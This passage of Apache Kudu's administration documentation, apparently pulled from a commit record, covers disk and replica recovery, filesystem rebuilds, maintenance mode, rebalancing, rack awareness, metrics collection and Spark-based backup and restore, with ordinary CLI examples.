portion of the disk is completely empty.\n. Stop the tablet server.\n. Run the `update_dirs` tool. For example, to add `\/data\/3`, run the following:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu fs update_dirs --force --fs_wal_dir=\/wals --fs_data_dirs=\/data\/1,\/data\/2,\/data\/3\n----\n+\n\n. Start the tablet server.\n. 
Run `ksck` to verify cluster health.\n+\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck master-01.example.com\n----\n+\n\n\nNote that existing tablets will not stripe to the restored disk; only new tablets\nwill.\n\n[[disk_full_recovery]]\n=== Recovering from Full Disks\nBy default, Kudu reserves a small amount of space (1% by capacity) in its\ndirectories; Kudu considers a disk full if there is less free space available\nthan the reservation. Kudu nodes can only tolerate running out of space on disks\non which certain Kudu directories are mounted. For more information about the\ndifferent Kudu directory types, see\nlink:configuration.html#directory_configuration[Kudu Directory Configurations].\nThe table below describes this behavior for each type of directory. The behavior\nis uniform across masters and tablet servers.\n[[disk_full_behavior]]\n.Kudu Full Disk Behavior\n[options=\"header\"]\n|===\n| Kudu Directory Type | Crash on a Full Disk?\n| Directory containing WALs | Yes\n| Directory containing tablet metadata | Yes\n| Directory containing data blocks only | No (see below)\n|===\n\nPrior to Kudu 1.7.0, Kudu striped tablet data across all directories and avoided\nwriting data to full directories; it would crash if all data directories\nwere full.\n\nIn 1.7.0 and later, new tablets are assigned a disk group consisting of\n`--fs_target_data_dirs_per_tablet` data directories (default 3). If Kudu is not configured\nwith enough data directories for a full disk group, all data directories are\nused. When a data directory is full, Kudu will stop writing new data to it and\neach tablet that uses that data directory will write new data to other data\ndirectories within its group. If all data directories for a tablet are full, Kudu\nwill crash. Periodically, Kudu will check if full data directories are still\nfull, and will resume writing to those data directories if space has become\navailable.\n\nIf Kudu does crash because its data directories are full, freeing space on the\nfull directories will allow the affected daemon to restart and resume writing.\nNote that it may be possible for Kudu to free some space by running\n\n[source,bash]\n----\n$ sudo -u kudu kudu fs check --repair\n----\n\nbut this command may also fail if there is too little space left.\n\nIt's also possible to allocate additional data directories to Kudu in order to\nincrease the overall amount of storage available. See the documentation on\n<<change_dir_config,updating a node's directory configuration>> for more\ninformation. Note that existing tablets will not use new data directories, so\nadding a new data directory does not resolve issues with full disks.\n\n[[tablet_majority_down_recovery]]\n=== Bringing a tablet that has lost a majority of replicas back online\n\nIf a tablet has permanently lost a majority of its replicas, it cannot recover\nautomatically and operator intervention is required. If the tablet servers\nhosting a majority of the replicas are down (i.e. ones reported as \"TS\nunavailable\" by ksck), they should be recovered instead if possible.\n\nWARNING: The steps below may cause recent edits to the tablet to be lost,\npotentially resulting in permanent data loss. Only attempt the procedure below\nif it is impossible to bring a majority back online.\n\nSuppose a tablet has lost a majority of its replicas. 
The first step in\ndiagnosing and fixing the problem is to examine the tablet's state using ksck:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster ksck --tablets=e822cab6c0584bc0858219d1539a17e6 master-00,master-01,master-02\nConnected to the Master\nFetched info from all 5 Tablet Servers\nTablet e822cab6c0584bc0858219d1539a17e6 of table 'my_table' is unavailable: 2 replica(s) not RUNNING\n 638a20403e3e4ae3b55d4d07d920e6de (tserver-00:7150): RUNNING\n 9a56fa85a38a4edc99c6229cba68aeaa (tserver-01:7150): bad state\n State: FAILED\n Data state: TABLET_DATA_READY\n Last status: <failure message>\n c311fef7708a4cf9bb11a3e4cbcaab8c (tserver-02:7150): bad state\n State: FAILED\n Data state: TABLET_DATA_READY\n Last status: <failure message>\n----\n\nThis output shows that, for tablet `e822cab6c0584bc0858219d1539a17e6`, the two\ntablet replicas on `tserver-01` and `tserver-02` failed. The remaining replica\nis not the leader, so the leader replica failed as well. This means the chance\nof data loss is higher since the remaining replica on `tserver-00` may have\nbeen lagging. In general, to accept the potential data loss and restore the\ntablet from the remaining replicas, divide the tablet replicas into two groups:\n\n1. Healthy replicas: Those in `RUNNING` state as reported by ksck\n2. Unhealthy replicas\n\nFor example, in the above ksck output, the replica on tablet server `tserver-00`\nis healthy, while the replicas on `tserver-01` and `tserver-02` are unhealthy.\nOn each tablet server with a healthy replica, alter the consensus configuration\nto remove unhealthy replicas. In the typical case of 1 out of 3 surviving\nreplicas, there will be only one healthy replica, so the consensus configuration\nwill be rewritten to include only the healthy replica.\n\n[source,bash]\n----\n$ sudo -u kudu kudu remote_replica unsafe_change_config tserver-00:7150 <tablet-id> <tserver-00-uuid>\n----\n\nwhere `<tablet-id>` is `e822cab6c0584bc0858219d1539a17e6` and\n`<tserver-00-uuid>` is the uuid of `tserver-00`,\n`638a20403e3e4ae3b55d4d07d920e6de`.\n\nOnce the healthy replicas' consensus configurations have been forced to exclude\nthe unhealthy replicas, the healthy replicas will be able to elect a leader.\nThe tablet will become available for writes, though it will still be\nunder-replicated. Shortly after the tablet becomes available, the leader master\nwill notice that it is under-replicated, and will cause the tablet to\nre-replicate until the proper replication factor is restored. The unhealthy\nreplicas will be tombstoned by the master, causing their remaining data to be\ndeleted.\n\n[[rebuilding_kudu]]\n=== Rebuilding a Kudu Filesystem Layout\n\nIn the event that critical files are lost, i.e. WALs or tablet-specific\nmetadata, all Kudu directories on the server must be deleted and rebuilt to\nensure correctness. Doing so will destroy the copy of the data for each tablet\nreplica hosted on the local server. Kudu will automatically re-replicate tablet\nreplicas removed in this way, provided the replication factor is at least three\nand all other servers are online and healthy.\n\nNOTE: These steps use a tablet server as an example, but the steps are the same\nfor Kudu master servers.\n\nWARNING: If multiple nodes need their FS layouts rebuilt, wait until all\nreplicas previously hosted on each node have finished automatically\nre-replicating elsewhere before continuing. 
Failure to do so can result in\npermanent data loss.\n\nWARNING: Before proceeding, ensure the contents of the directories are backed\nup, either as a copy or in the form of other tablet replicas.\n\n. The first step to rebuilding a server with a new directory configuration is\n emptying all of the server's existing directories. For example, if a tablet\n server is configured with `--fs_wal_dir=\/data\/0\/kudu-tserver-wal`,\n `--fs_metadata_dir=\/data\/0\/kudu-tserver-meta`, and\n `--fs_data_dirs=\/data\/1\/kudu-tserver,\/data\/2\/kudu-tserver`, the following\n commands will remove the WAL directory's and data directories' contents:\n\n+\n[source,bash]\n----\n# Note: this will delete all of the data from the local tablet server.\n$ rm -rf \/data\/0\/kudu-tserver-wal\/* \/data\/0\/kudu-tserver-meta\/* \/data\/1\/kudu-tserver\/* \/data\/2\/kudu-tserver\/*\n----\n+\n\n. If using CM, update the configurations for the rebuilt server to include only\n the desired directories. Make sure to only update the configurations of servers\n to which changes were applied, rather than of the entire Kudu service.\n\n. After directories are deleted, the server process can be started with the new\n directory configuration. The appropriate sub-directories will be created by\n Kudu upon starting up.\n\n[[minimizing_cluster_disruption_during_temporary_single_ts_downtime]]\n=== Minimizing cluster disruption during temporary planned downtime of a single tablet server\n\nIf a single tablet server is brought down temporarily in a healthy cluster, all\ntablets will remain available and clients will function as normal, after\npotential short delays due to leader elections. However, if the downtime lasts\nfor more than `--follower_unavailable_considered_failed_sec` (default 300)\nseconds, the tablet replicas on the down tablet server will be replaced by new\nreplicas on available tablet servers. This will cause stress on the cluster\nas tablets re-replicate and, if the downtime lasts long enough, significant\nreduction in the number of replicas on the down tablet server, which would\nrequire the rebalancer to fix.\n\nTo work around this, in Kudu versions from 1.11 onwards, the `kudu` CLI\ncontains a tool to put tablet servers into maintenance mode. While in this\nstate, the tablet server\u2019s replicas are not re-replicated due to its downtime\nalone, though re-replication may still occur in the event that the server in\nmaintenance suffers from a disk failure or if a follower replica on the tablet\nserver falls too far behind its leader replica. Upon exiting maintenance,\nre-replication is triggered for any remaining under-replicated tablets.\n\nThe `kudu tserver state enter_maintenance` and `kudu tserver state\nexit_maintenance` tools are added to orchestrate tablet server maintenance.\nThe following can be run from a tablet server to put it into maintenance:\n\n[source,bash]\n----\n$ TS_UUID=$(sudo -u kudu kudu fs dump uuid --fs_wal_dir=<wal_dir> --fs_data_dirs=<data_dirs>)\n$ sudo -u kudu kudu tserver state enter_maintenance <master_addresses> \"$TS_UUID\"\n----\n\nThe tablet server maintenance mode is shown in the \"Tablet Servers\" page of the\nKudu leader master's web UI, and in the output of `kudu cluster ksck`. To exit\nmaintenance mode, run the following:\n\n[source,bash]\n----\n$ sudo -u kudu kudu tserver state exit_maintenance <master_addresses> \"$TS_UUID\"\n----\n\nIn versions prior to 1.11, a different approach must be used to prevent\nunwanted re-replication. 
Increase\n`--follower_unavailable_considered_failed_sec` on all tablet servers so the\namount of time before re-replication starts is longer than the expected\ndowntime of the tablet server, including the time it takes the tablet server to\nrestart and bootstrap its tablet replicas. To do this, run the following\ncommand for each tablet server:\n\n[source,bash]\n----\n$ sudo -u kudu kudu tserver set_flag <tserver_address> follower_unavailable_considered_failed_sec <num_seconds>\n----\n\nwhere `<num_seconds>` is the number of seconds that will encompass the downtime.\nOnce the downtime is finished, reset the flag to its original value.\n\n[source,bash]\n----\n$ sudo -u kudu kudu tserver set_flag <tserver_address> follower_unavailable_considered_failed_sec <original_value>\n----\n\nWARNING: Be sure to reset the value of `--follower_unavailable_considered_failed_sec`\nto its original value.\n\nNOTE: On Kudu versions prior to 1.8, the `--force` flag must be provided in the above\n`set_flag` commands.\n\n[[rebalancer_tool]]\n=== Running the tablet rebalancing tool\n\nThe `kudu` CLI contains a rebalancing tool that can be used to rebalance\ntablet replicas among tablet servers. For each table, the tool attempts to\nbalance the number of replicas per tablet server. It will also, without\nunbalancing any table, attempt to even out the number of replicas per tablet\nserver across the cluster as a whole. The rebalancing tool should be run as the\nKudu admin user, specifying all master addresses:\n\n[source,bash]\n----\n$ sudo -u kudu kudu cluster rebalance master-01.example.com,master-02.example.com,master-03.example.com\n----\n\nWhen run, the rebalancer will report on the initial tablet replica distribution\nin the cluster, log the replicas it moves, and print a final summary of the\ndistribution when it terminates:\n\n----\nPer-server replica distribution summary:\n Statistic | Value\n-----------------------+-----------\n Minimum Replica Count | 0\n Maximum Replica Count | 24\n Average Replica Count | 14.400000\n\nPer-table replica distribution summary:\n Replica Skew | Value\n--------------+----------\n Minimum | 8\n Maximum | 8\n Average | 8.000000\n\nI0613 14:18:49.905897 3002065792 rebalancer.cc:779] tablet e7ee9ade95b342a7a94649b7862b345d: 206a51de1486402bbb214b5ce97a633c -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move scheduled\nI0613 14:18:49.917578 3002065792 rebalancer.cc:779] tablet 5f03944529f44626a0d6ec8b1edc566e: 6e64c4165b864cbab0e67ccd82091d60 -> ba8c22ab030346b4baa289d6d11d0809 move scheduled\nI0613 14:18:49.928683 3002065792 rebalancer.cc:779] tablet 9373fee3bfe74cec9054737371a3b15d: fab382adf72c480984c6cc868fdd5f0e -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move scheduled\n\n... (full output elided)\n\nI0613 14:19:01.162802 3002065792 rebalancer.cc:842] tablet f4c046f18b174cc2974c65ac0bf52767: 206a51de1486402bbb214b5ce97a633c -> 3b4d9266ac8c45ff9a5d4d7c3e1cb326 move completed: OK\n\nrebalancing is complete: cluster is balanced (moved 28 replicas)\nPer-server replica distribution summary:\n Statistic | Value\n-----------------------+-----------\n Minimum Replica Count | 14\n Maximum Replica Count | 15\n Average Replica Count | 14.400000\n\nPer-table replica distribution summary:\n Replica Skew | Value\n--------------+----------\n Minimum | 1\n Maximum | 1\n Average | 1.000000\n----\n\nIf more details are needed in addition to the replica distribution summary,\nuse the `--output_replica_distribution_details` flag. 
If added, the flag makes\nthe tool print per-table and per-tablet server replica distribution statistics\nas well.\n\nUse the `--report_only` flag to get a report on table- and cluster-wide\nreplica distribution statistics without starting any rebalancing activity.\n\nThe rebalancer can also be restricted to run on a subset of the tables by\nsupplying the `--tables` flag. Note that, when running on a subset of tables,\nthe tool will not attempt to balance the cluster as a whole.\n\nThe length of time the rebalancer runs can be controlled with the flag\n`--max_run_time_sec`. By default, the rebalancer will run until the cluster is\nbalanced. To control the amount of resources devoted to rebalancing, modify\nthe flag `--max_moves_per_server`. See `kudu cluster rebalance --help` for more.\n\nIt's safe to stop the rebalancer tool at any time. When restarted, the\nrebalancer will continue rebalancing the cluster.\n\nThe rebalancer requires all registered tablet servers to be up and running\nto proceed with the rebalancing process. This is to avoid possible conflicts\nand races with the automatic re-replication and to keep replica placement optimal\nfor the current configuration of the cluster. If a tablet server becomes\nunavailable during the rebalancing session, the rebalancer will exit. As noted\nabove, it's safe to restart the rebalancer after resolving the issue with\nunavailable tablet servers.\n\nThe rebalancing tool can rebalance Kudu clusters running older versions as well,\nwith some restrictions. Consult the following table for more information. In the\ntable, \"RF\" stands for \"replication factor\".\n\n[[rebalancer_compatibility]]\n.Kudu Rebalancing Tool Compatibility\n[options=\"header\"]\n|===\n| Version Range | Rebalances RF = 1 Tables? | Rebalances RF > 1 Tables?\n| v < 1.4.0 | No | No\n| 1.4.0 +<=+ v < 1.7.1 | No | Yes\n| v >= 1.7.1 | Yes | Yes\n|===\n\nIf the rebalancer is running against a cluster where rebalancing replication\nfactor one tables is not supported, it will rebalance all the other tables\nand the cluster as if those singly-replicated tables did not exist.\n\n[[rebalancer_tool_with_rack_awareness]]\n=== Running the tablet rebalancing tool on a rack-aware cluster\n\nAs detailed in the <<rack_awareness, rack awareness>> section, it's possible\nto use the `kudu cluster rebalance` tool to establish the placement policy on a\ncluster. This might be necessary when the rack awareness feature is first\nconfigured or when re-replication violated the placement policy. The rebalancing\ntool breaks its work into three phases:\n\n. The rack-aware rebalancer tries to establish the placement policy. Use the\n `--disable_policy_fixer` flag to skip this phase.\n. The rebalancer tries to balance load by location, moving tablet replicas\n between locations in an attempt to spread tablet replicas among locations\n evenly. The load of a location is measured as the total number of replicas in\n the location divided by the number of tablet servers in the location. Use the\n `--disable_cross_location_rebalancing` flag to skip this phase.\n. The rebalancer tries to balance the tablet replica distribution within each\n location, as if the location were a cluster on its own. 
Use the\n `--disable_intra_location_rebalancing` flag to skip this phase.\n\nBy using the `--report_only` flag, it's also possible to check if all tablets in\nthe cluster conform to the placement policy without attempting any replica\nmovement.\n\n[[tablet_server_decommissioning]]\n=== Decommissioning or Permanently Removing a Tablet Server From a Cluster\n\nKudu does not currently have an automated way to remove a tablet server from\na cluster permanently. Instead, use the following steps:\n\n. Ensure the cluster is in good health using `ksck`. See <<ksck>>.\n. If the tablet server contains any replicas of tables with replication factor\n 1, these replicas must be manually moved off the tablet server prior to\n shutting it down. The `kudu tablet change_config move_replica` tool can be\n used for this.
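\n+\nA sketch of such a move is shown below; the tablet ID and the source and destination tablet server UUIDs are placeholders, and both can be obtained from `ksck` output:\n+\n[source,bash]\n----\n$ sudo -u kudu kudu tablet change_config move_replica master-01.example.com,master-02.example.com,master-03.example.com <tablet_id> <from_tserver_uuid> <to_tserver_uuid>\n----\n. Shut down the tablet server. After\n `--follower_unavailable_considered_failed_sec`, which defaults to 5 minutes,\n Kudu will begin to re-replicate the tablet server's replicas to other servers.\n Wait until the process is finished. Progress can be monitored using `ksck`.\n. Once all the copies are complete, `ksck` will continue to report the tablet\n server as unavailable. The cluster will otherwise operate fine without the\n tablet server. To completely remove it from the cluster so `ksck` shows the\n cluster as completely healthy, restart the masters. In the case of a single\n master, this will cause cluster downtime. With multi-master, restart the\n masters in sequence to avoid cluster downtime.\n\nWARNING: Do not shut down multiple tablet servers at once. To remove multiple\ntablet servers from the cluster, follow the above instructions for each tablet\nserver, ensuring that the previous tablet server is removed from the cluster and\n`ksck` is healthy before shutting down the next.\n\n[[using_cluster_names_in_kudu_tool]]\n=== Using cluster names in the `kudu` command line tool\n\nWhen using the `kudu` command line tool, it can be difficult to remember the\nprecise list of Kudu master RPC addresses needed to communicate with a cluster,\nespecially when managing multiple clusters. As an alternative, the command line\ntool can identify clusters by name. To use this functionality:\n\n. Create a new directory to store the Kudu configuration file.\n. Export the path to this directory in the `KUDU_CONFIG` environment variable.\n. Create a file called `kudurc` in the new directory.\n. Populate `kudurc` as follows, substituting your own cluster names and RPC\n addresses:\n+\n----\nclusters_info:\n cluster_name1:\n master_addresses: ip1:port1,ip2:port2,ip3:port3\n cluster_name2:\n master_addresses: ip4:port4\n----\n+\n. When using the `kudu` command line tool, replace the list of Kudu master RPC\n addresses with the cluster name, prepended with the character `@`.\n\n Example::\n+\n----\n$ sudo -u kudu kudu cluster ksck @cluster_name1\n----\n+\n\n\nNOTE: Cluster names may be used as input in any invocation of the `kudu` command\nline tool that expects a list of Kudu master RPC addresses.\n","old_contents":"\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. 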
You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n[[administration]]\n= Apache Kudu Administration\n\n:author: Kudu Team\n:imagesdir: .\/images\n:icons: font\n:toc: left\n:toclevels: 3\n:doctype: book\n:backend: html5\n:sectlinks:\n:experimental:\n\n== Starting and Stopping Kudu Processes\n\nNOTE: These instructions are relevant only when Kudu is installed using operating system packages\n(e.g. `rpm` or `deb`).\n\ninclude::installation.adoc[tags=start_stop]\n\n== Kudu Web Interfaces\n\nKudu tablet servers and masters expose useful operational information on a built-in web interface.\n\n=== Kudu Master Web Interface\n\nKudu master processes serve their web interface on port 8051. The interface exposes several pages\nwith information about the cluster state:\n\n- A list of tablet servers, their hostnames, and the time of their last heartbeat.\n- A list of tables, including schema and tablet location information for each.\n- SQL code which you can paste into Impala Shell to add an existing table to Impala's list of known data sources.\n\n=== Kudu Tablet Server Web Interface\n\nEach tablet server serves a web interface on port 8050. The interface exposes information\nabout each tablet hosted on the server, its current state, and debugging information\nabout maintenance background operations.\n\n=== Common Web Interface Pages\n\nBoth Kudu masters and tablet servers expose a common set of information via their web interfaces:\n\n- HTTP access to server logs.\n- an `\/rpcz` endpoint which lists currently running RPCs via JSON.\n- pages giving an overview and detailed information on the memory usage of different\n components of the process.\n- information on the current set of configuration flags.\n- information on the currently running threads and their resource consumption.\n- a JSON endpoint exposing metrics about the server.\n- information on the deployed version number of the daemon.\n\nThese interfaces are linked from the landing page of each daemon's web UI.\n\n== Kudu Metrics\n\nKudu daemons expose a large number of metrics. Some metrics are associated with an entire\nserver process, whereas others are associated with a particular tablet replica.\n\n=== Listing available metrics\n\nThe full set of available metrics for a Kudu server can be dumped via a special command\nline flag:\n\n[source,bash]\n----\n$ kudu-tserver --dump_metrics_json\n$ kudu-master --dump_metrics_json\n----\n\nThis will output a large JSON document. Each metric indicates its name, label, description,\nunits, and type. Because the output is JSON-formatted, this information can easily be\nparsed and fed into other tooling which collects metrics from Kudu servers.
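\n\nFor example, a sketch that lists metric names from the dump, assuming `jq` is installed and that the output is an array of entities with nested `metrics` arrays (the layout shown for the HTTP endpoint below):\n\n[source,bash]\n----\n# List the names of all metrics a tablet server knows about, assuming the\n# dump shares the entity\/metrics layout of the \/metrics HTTP endpoint.\n$ kudu-tserver --dump_metrics_json 2>\/dev\/null | jq -r '.[].metrics[].name' | sort -u\n----\n\n=== Collecting metrics via HTTP\n\nMetrics can be collected from a server process via its HTTP interface by visiting\n`\/metrics`. The output of this page is JSON for easy parsing by monitoring services.\nThis endpoint accepts several `GET` parameters in its query string:\n\n- `\/metrics?metrics=<substring1>,<substring2>,...` - limits the returned metrics to those which contain\nat least one of the provided substrings. 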
The substrings also match entity names, so this\nmay be used to collect metrics for a specific tablet.\n\n- `\/metrics?include_schema=1` - includes metrics schema information such as unit, description,\nand label in the JSON output. This information is typically elided to save space.\n\n- `\/metrics?compact=1` - eliminates unnecessary whitespace from the resulting JSON, which can decrease\nbandwidth when fetching this page from a remote host.\n\n- `\/metrics?include_raw_histograms=1` - includes the raw buckets and values for histogram metrics,\nenabling accurate aggregation of percentile metrics over time and across hosts.\n\n- `\/metrics?level=info` - limits the returned metrics based on their severity level.\nThe levels are ordered by severity; requesting a less severe level also returns the metrics of all\nmore severe levels. If no level is specified,\n`debug` is used to include all metrics. The valid values are:\n * `debug` - Metrics that are diagnostically helpful but generally not monitored\n during normal operation.\n * `info` - Generally useful metrics that operators always want to have available\n but may not be monitored under normal circumstances.\n * `warn` - Metrics which can often indicate operational oddities, which may need more investigation.\n\nFor example:\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?include_schema=1&metrics=connections_accepted'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"server\",\n \"id\": \"kudu.tabletserver\",\n \"attributes\": {},\n \"metrics\": [\n {\n \"name\": \"rpc_connections_accepted\",\n \"label\": \"RPC Connections Accepted\",\n \"type\": \"counter\",\n \"unit\": \"connections\",\n \"description\": \"Number of incoming TCP connections made to the RPC server\",\n \"value\": 92\n }\n ]\n }\n]\n----\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?metrics=log_append_latency'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"tablet\",\n \"id\": \"c0ebf9fef1b847e2a83c7bd35c2056b1\",\n \"attributes\": {\n \"table_name\": \"lineitem\",\n \"partition\": \"hash buckets: (55), range: [(<start>), (<end>))\",\n \"table_id\": \"\"\n },\n \"metrics\": [\n {\n \"name\": \"log_append_latency\",\n \"total_count\": 7498,\n \"min\": 4,\n \"mean\": 69.3649,\n \"percentile_75\": 29,\n \"percentile_95\": 38,\n \"percentile_99\": 45,\n \"percentile_99_9\": 95,\n \"percentile_99_99\": 167,\n \"max\": 367244,\n \"total_sum\": 520098\n }\n ]\n }\n]\n----\n\nNOTE: All histograms and counters are measured since the server start time, and are not reset upon collection.\n\n=== Diagnostics Logging\n\nKudu may be configured to dump various diagnostic information to a local log file.\nThe diagnostics log will be written to the same directory as the other Kudu log files, with a\nsimilar naming format, substituting `diagnostics` instead of a log level like `INFO`.\nAfter any diagnostics log file reaches 64MB uncompressed, the log will be rolled and\nthe previous file will be gzip-compressed.\n\nEach line in the diagnostics log consists of the following components:\n\n* A human-readable timestamp formatted in the same fashion as the other Kudu log files.\n* The type of record. For example, a metrics record consists of the word `metrics`.\n* A machine-readable timestamp, in microseconds since the Unix epoch.\n* The record itself.\n\nCurrently, the only type of diagnostics record is a periodic dump of the server metrics.\nEach record is encoded in compact JSON format, and the server attempts to elide any metrics\nwhich have not changed since the previous record. 
In addition, counters which have never\nbeen incremented are elided. Otherwise, the format of the JSON record is identical to the\nformat exposed by the HTTP endpoint above.\n\nThe frequency with which metrics are dumped to the diagnostics log is configured using the\n`--metrics_log_interval_ms` flag. By default, Kudu logs metrics every 60 seconds.\n\n[[rack_awareness]]\n== Rack Awareness\n\nAs of version 1.9, Kudu supports a rack awareness feature. Kudu's ordinary\nre-replication methods ensure the availability of the cluster in the event of a\nsingle node failure. However, clusters can be vulnerable to correlated failures\nof multiple nodes. For example, all of the physical hosts on the same rack in\na datacenter may become unavailable simultaneously if the top-of-rack switch\nfails. Kudu's rack awareness feature provides protection from some kinds of\ncorrelated failures, like the failure of a single rack in a datacenter.\n\nThe first element of Kudu's rack awareness feature is location assignment. When\na tablet server or client registers with a master, the master assigns it a\nlocation. A location is a `\/`-separated string that begins with a `\/` and where\neach `\/`-separated component consists of characters from the set\n`[a-zA-Z0-9_-.]`. For example, `\/dc-0\/rack-09` is a valid location, while\n`rack-04` and `\/rack=1` are not valid locations. Thus location strings resemble\nabsolute UNIX file paths where characters in directory and file names are\nrestricted to the set `[a-zA-Z0-9_-.]`. Presently, Kudu does not use the\nhierarchical structure of locations, but it may in the future. Location\nassignment is done by a user-provided command, whose path should be specified\nusing the `--location_mapping_cmd` master flag. The command should take a single\nargument, the IP address or hostname of a tablet server or client, and return\nthe location for the tablet server or client. Make sure that all Kudu masters\nare using the same location mapping command.
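\n\nThe following is a minimal sketch of such a mapping command, using a static, hypothetical host-to-rack table; a real deployment might instead consult an inventory database or a configuration management system:\n\n[source,bash]\n----\n#!\/bin\/bash\n# Hypothetical location mapping script. The master invokes it as:\n#   location_mapping.sh <ip-or-hostname>\n# and reads the assigned location from stdout.\ncase \"$1\" in\n  tserver-0[1-3].example.com) echo \"\/dc-0\/rack-01\" ;;\n  tserver-0[4-6].example.com) echo \"\/dc-0\/rack-02\" ;;\n  *) echo \"\/dc-0\/rack-default\" ;;\nesac\n----\n\nThe second element of Kudu's rack awareness feature is the placement policy,\nwhich is\n\n Do not place a majority of replicas of a tablet on tablet servers in the same location.\n\nThe leader master, when placing newly created replicas on tablet servers and\nwhen re-replicating existing tablets, will attempt to place the replicas in a\nway that complies with the placement policy. For example, in a cluster with five\ntablet servers `A`, `B`, `C`, `D`, and `E`, with respective locations `\/L0`,\n`\/L0`, `\/L1`, `\/L1`, `\/L2`, to comply with the placement policy a new 3x\nreplicated tablet could have its replicas placed on `A`, `C`, and `E`, but not\non `A`, `B`, and `C`, because then the tablet would have 2\/3 replicas in\nlocation `\/L0`. As another example, if a tablet has replicas on tablet servers\n`A`, `C`, and `E`, and then `C` fails, the replacement replica must be placed on\n`D` in order to comply with the placement policy.\n\nIn the case where it is impossible to place replicas in a way that complies with\nthe placement policy, Kudu will violate the policy and place a replica anyway.\nFor example, using the setup described in the previous paragraph, if a tablet\nhas replicas on tablet servers `A`, `C`, and `E`, and then `E` fails, Kudu will\nre-replicate the tablet onto one of `B` or `D`, violating the placement policy,\nrather than leaving the tablet under-replicated indefinitely. The\n`kudu cluster rebalance` tool can reestablish the placement policy if it is\npossible to do so. 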
The `kudu cluster rebalance` tool can also be used to\nestablish the placement policy on a cluster if the cluster has just been\nconfigured to use the rack awareness feature and existing replicas need to be\nmoved to comply with the placement policy. See\n<<rebalancer_tool_with_rack_awareness,running the tablet rebalancing tool on a rack-aware cluster>>\nfor more information.\n\nThe third and final element of Kudu's rack awareness feature is the use of\nclient locations to find \"nearby\" servers. As mentioned, the masters also\nassign a location to clients when they connect to the cluster. The client\n(whether Java, {cpp}, or Python) uses its own location and the locations of\ntablet servers in the cluster to prefer \"nearby\" replicas when scanning in\n`CLOSEST_REPLICA` mode. Clients choose replicas to scan in the following order:\n\n. Scan a replica on a tablet server on the same host, if there is one.\n. Scan a replica on a tablet server in the same location, if there is one.\n. Scan some replica.\n\nFor example, using the cluster setup described above, if a client on the same\nhost as tablet server `A` scans a tablet with replicas on tablet servers\n`A`, `C`, and `E` in `CLOSEST_REPLICA` mode, it will choose to scan from the\nreplica on `A`, since the client and the replica on `A` are on the same host.\nIf the client scans a tablet with replicas on tablet servers `B`, `C`, and `E`,\nit will choose to scan from the replica on `B`, since it is in the same\nlocation as the client, `\/L0`. If there are multiple replicas meeting a\ncriterion, one is chosen arbitrarily.\n\n[[backup]]\n== Backup and Restore\n\n[[logical_backup]]\n=== Logical backup and restore\n\nAs of Kudu 1.10.0, Kudu supports both full and incremental table backups via a\njob implemented using Apache Spark. Additionally, it supports restoring tables\nfrom full and incremental backups via a restore job implemented using Apache Spark.\n\nGiven that the Kudu backup and restore jobs use Apache Spark, ensure Apache Spark\nis installed in your environment following the\nlink:https:\/\/spark.apache.org\/docs\/latest\/#downloading[Spark documentation].\nAdditionally, review the Apache Spark documentation for\nlink:https:\/\/spark.apache.org\/docs\/latest\/submitting-applications.html[Submitting Applications].\n\n==== Backing up tables\n\nTo back up one or more Kudu tables, the `KuduBackup` Spark job can be used.\nThe first time the job is run for a table, a full backup will be run.\nAdditional runs will perform incremental backups which will only contain the\nrows that have changed since the initial full backup. A new set of full\nbackups can be forced at any time by passing the `--forceFull` flag to the\nbackup job.\n\nThe common flags that will be used when taking a backup are:\n\n* `--rootPath`: The root path to output backup data. Accepts any Spark-compatible path.\n** See <<backup_directory>> for the directory structure used in the `rootPath`.\n* `--kuduMasterAddresses`: Comma-separated addresses of Kudu masters. 
Default: `localhost`\n* `<table>...`: A list of tables to be backed up.\n\nNote: You can see the full list of job options at any time by passing the `--help` flag.\n\nBelow is a full example of a `KuduBackup` job execution which will back up the tables\n`foo` and `bar` to the HDFS directory `kudu-backups`:\n\n[source,bash]\n----\nspark-submit --class org.apache.kudu.backup.KuduBackup kudu-backup2_2.11-1.10.0.jar \\\n --kuduMasterAddresses master1-host,master-2-host,master-3-host \\\n --rootPath hdfs:\/\/\/kudu-backups \\\n foo bar\n----\n\n==== Restoring tables from backups\n\nTo restore one or more Kudu tables, the `KuduRestore` Spark job can be used.\nFor each backed up table, the `KuduRestore` job will restore the full backup\nand each associated incremental backup until the full table state is restored.\nRestoring the full series of full and incremental backups is possible because\nthe backups are linked via the `from_ms` and `to_ms` fields in the backup metadata.\nBy default the restore job will create tables with the same name as the table\nthat was backed up. If you want to side-load the tables without affecting the\nexisting tables, you can pass `--tableSuffix` to append a suffix to each\nrestored table.\n\nThe common flags that will be used when restoring are:\n\n* `--rootPath`: The root path to the backup data. Accepts any Spark-compatible path.\n** See <<backup_directory>> for the directory structure used in the `rootPath`.\n* `--kuduMasterAddresses`: Comma-separated addresses of Kudu masters. Default: `localhost`\n* `--createTables`: If set to `true`, the restore process creates the tables.\n Set to `false` if the target tables already exist. Default: `true`.\n* `--tableSuffix`: If set, the suffix to add to the restored table names.\n Only used when `createTables` is `true`.\n* `--timestampMs`: A UNIX timestamp in milliseconds that defines the latest time\n to use when selecting restore candidates. Default: `System.currentTimeMillis()`\n* `<table>...`: A list of tables to restore.\n\nNote: You can see the full list of job options at any time by passing the `--help` flag.\n\nBelow is a full example of a `KuduRestore` job execution which will restore the tables\n`foo` and `bar` from the HDFS directory 